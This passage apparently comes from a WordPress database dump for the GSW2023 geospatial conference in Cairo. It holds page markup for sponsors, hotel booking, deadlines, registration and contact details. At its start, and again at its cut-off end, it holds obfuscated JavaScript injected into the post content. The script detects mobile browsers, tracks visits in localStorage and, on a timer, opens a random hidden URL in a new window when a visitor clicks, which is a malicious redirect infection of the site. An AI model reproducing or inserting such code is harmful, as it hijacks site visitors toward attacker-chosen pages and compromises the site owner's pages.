|\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:19:30','2023-05-17 05:19:30','',3066,'https://gsw2023.com/?p=4526',0,'revision','',0),
(4527,1,'2023-05-17 05:20:58','2023-05-17 05:20:58','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row]\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 